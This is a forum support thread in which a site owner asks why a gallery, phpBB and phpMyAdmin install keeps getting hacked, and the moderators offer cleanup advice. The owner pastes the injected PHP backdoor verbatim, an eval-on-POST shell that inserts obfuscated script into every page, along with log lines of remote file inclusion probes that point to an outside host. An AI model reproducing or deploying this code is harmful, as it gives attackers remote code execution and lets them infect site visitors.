hacked hacked
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

hacked

Started by ksxj, March 29, 2009, 09:32:08 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

ksxj

I have tried checking the databases for unknown admin accounts and don't see anything. 
I tried to delete all files and copy my backup files back over.
I tried reinstalling from scratch.
But about 5min - 30 hrs after I open the directory back up to the public it gets hacked again.

Has anyone else had this problem?
could really use some help!!!!!!!

It messes up my phpbb files, myphpadmin files, and coppermine files.



<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdncyUzQ0N4c09KMGNyaXB0JTIwc3JjJTNEZ3MlMkYwd2UlMkZuZzlnczRoVWglMkVoVWgyNDclMkUyalhUJTJFbmcxT0owOTVDeCUyRmhVaGpxT0owdWVyQ3h5Q3glMkVqc25nJTNFJTNDbmclMkZzY3JqWFRpcGhVaHRncyUzRScpLnJlcGxhY2UoL2hVaHxqWFR8Z3N8c1Z8MHdlfEN4fE9KMHxuZy9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>



phill104

A link to your site would help.

Are you using the latest versions of all the software you have installed?

Have you done a full scan of your setup and all the files in there?

Have you read the yikes, I've been hacked thread?

http://forum.coppermine-gallery.net/index.php/topic,51927.0.html
It is a mistake to think you can solve any major problems just with potatoes.

ksxj



the site is www.kamojeepclub.org and my personal site www.larsons.info


But I have taken the site down.  Trying to fix it.  But yes I did a fresh install with all of the newest versions.  It took 5 minutes for it to be hacked.  And yes I read that forum.

Joachim Müller

Just performing a fresh install won't help. As suggested in the Yikes thread, you need to sanitize your entire site. This includes closing all possible backdoors and loopholes. Usually, attackers don't leave and admin account behind inside the database, as that's quite obvious to figure and and to fix. More elegantly they hide a little script that let's them take over your site again in a file that looks innocent. They usually hide that file outside of the folder that contains the app that let them get in in the first place. It's quite likely that that backdoor they use doesn't reside in your coppermine folder. Therefor, your fresh installs won't accomplish anything good.
I'm sorry, but this is something you can't really expect our help with: as suggested in the Yikes-thread, you're welcome to try to sanitize for yourself. If this doesn't help, ask your webhost for support. If this doesn't help, hire a pro. It's really beyond the scope of free support to clean your hacked site. It's beyond the scope of this site as well to explain to your what hackers do to infest your site - even if we would be ready to post such instructions, wannabe script kiddies would benefit more from such instructions than you as site owner (who usually doesn't have any hacking skills, which is understandable and fine).
I can understand that this might sound frustrating for you, but you have to understand that we simply can not help you more with this.
In the future, please use better subjects for your postings.

ksxj

what do you consider sanatizing my entire site.  I deleted every file and folder and started a fresh install from scratch.  Then double checked that all the permissions on the folders and files where correct.   Just got done doing it that for the second time yesterday.  My site was hacked again sometime today.

phill104

When you say you sanitised the entire site, do you mean every file including phpbb and myphpadmin? Have you upgraded those to tha latest version too? Have you checked through all the files in your album folders for malicious scripts?

The best bet would be to ask your host to check the server logs. They should be able to see where the scumbags got in and what changes they have made.
It is a mistake to think you can solve any major problems just with potatoes.

ksxj

on either yahoo or godaddy I don't get the choice of version of phpmyadmin.  Plus they both say it will take a courts supena to get the access log file.  I have my access logs setup but they are not descriptive enough.  But yes I deleted every html, php file off my server and then reinstalled and double checked permissions on each file.

Joachim Müller

What do you consider a re-install? Your site looks pretty customized to me - it's not a just a vanilla install. At least the forum theme must come from somewhere - from a copy on your hard-drive ideally. Can't say anything about your gallery, as you require visitors to log in. The gallery certainly isn't a fresh install neither - as you have indexes on (which is a very bad thing in terms of security) I was able to browse your albums folder and spot that there are loads of sub-folders and files. All script kiddies are obviously welcome to browse your page - that's like saying "hackers welcome" at the front door. Did you actuall read the Yikes-thread and do as suggested? I don't think so: it looks like you haven't sanitized nor have you re-installed properly - a re-install would mean an empty slate and not a populated gallery and forum. Look like you re-added the hack by restoring the files or not deleting them in the first place. As suggested in the Yikes-thread: you need to sanitize your site, which is a time-consuming job.

ksxj

what do you mean by?
as you have indexes on (which is a very bad thing in terms of security)


It is a fresh install. I reinstalled all those addins, custom settings and all and uploaded all new img files while it was still up and running.  I stayed up all night to get it done but I did do it.  now for the albums folder, I didn't realize that.  It was not that way the first time I got hacked though.  Which brings up why I am posting this.  I just want to know how they got in and continually getting in.  Just getting real frustrated and need some assistance.

ksxj

Oh I consider a fresh install to be where I download the ost updated version of code from this site and used my ftp program and told it to install. 

phill104

It is impossible for us to know how they got in. It might have been through coppermine but could be through so many other ways including problems with your hosting. I have seen hosts have an entire server full of users get hacked when they get in through one user which might not be you. You also have other applications on your system that could have allowed the hackers in.

The only way to be sure is to check the logs or ask your host to explain how they got in. If your host is unwilling to do that then maybe you should consider alternative options. By not telling you they are compromising their system so it is in their best interests to help.

It is a mistake to think you can solve any major problems just with potatoes.

Joachim Müller

Indexes being on is not related to coppermine. Please google for it or ask your webhost.

ksxj

so its happened again!!!!!!!!!!!

found these in my log file.  Is this how they are getting in?

"GET /gallery/albums/inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"

"GET /inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"

founds some interesting reading on ppa_root_path

http://anonymousite.altervista.org/wordpress/2008/09/01/20/

http://www.securityfocus.com/bid/14209/exploit

http://www.geocities.com/hsia_joe/Tutorial.txt

Can someone please help me???!!!!!

ksxj


Nibbler

Those are vulnerabilities in other applications.

ksxj

then why are they using it in my site with your software installed???

"GET /gallery/albums/inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"

"GET /inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"



Nibbler

It's an automatic attack. You don't have that software installed so it fails. That's what the log message is telling you: 404 - file not found.

ksxj

thanks that makes more sense.


But I still don't understand how they are getting into my site and inserting code! 

Nibbler

Make sure your gallery is up to date and fully sanitised.

ksxj

I know that is your first response but I have done that mult times now and has not fixed the issue.